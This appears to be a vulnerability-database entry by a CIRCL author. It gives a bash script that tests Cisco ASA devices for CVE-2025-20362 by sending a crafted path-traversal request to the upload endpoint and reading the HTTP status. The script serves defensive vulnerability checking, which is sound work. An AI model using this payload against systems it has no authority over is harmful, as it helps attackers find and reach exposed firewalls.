Check vulnerables ASA's script

vulnerability:exploitability=industrialised vulnerability:information=PoC

Created on 2025-10-06 15:02 and updated on 2025-10-06 16:25.

Description

The script is available there to check if an ASA is vulnerable.

https://gist.cnw.circl.lu/alexandre.dulaunoy/95ca6ae6259e4c8b899b916ee8b3d4a6

#!/bin/bash

# CIRCL - 2025
# Test CVE 2025-20362
# Ref : https://attackerkb.com/topics/Szq5u0xgUX/cve-2025-20362/rapid7-analysis

if [ -z "$1" ]; then
  echo "Test for CVE-2025-20362"
  echo "Usage: $0 <IP>"
  exit 1
fi

IP="$1"

echo "Looking for CVE-2025-20362"
response=$(OPENSSL_CONF=<( 
  echo -e 'openssl_conf = openssl_init\n\n[openssl_init]\nssl_conf = ssl_sect\n\n[ssl_sect]'
  echo -e 'system_default = system_default_sect\n\n[system_default_sect]\nOptions = UnsafeLegacyRenegotiation\n'
  cat /etc/ssl/openssl.cnf
) curl "https://$IP/+CSCOU+//../+CSCOE+/files/file_action.html?mode=upload&path=foo&server=srv&sourceurl=qaz" \
  -S --insecure -v -o - --path-as-is 2>&1)

if echo "$response" | grep -q "HTTP/1.1 404"; then
  echo "Not vulnerable"
elif echo "$response" | grep -q "HTTP/1.1 200"; then
  echo "Vulnerable"
fi

Associated vulnerability

CVE-2025-20362

Related vulnerabilities


Meta

[
  {
    "tags": [
      "vulnerability:exploitability=industrialised",
      "vulnerability:information=PoC"
    ]
  }
]

Author

Paul Jung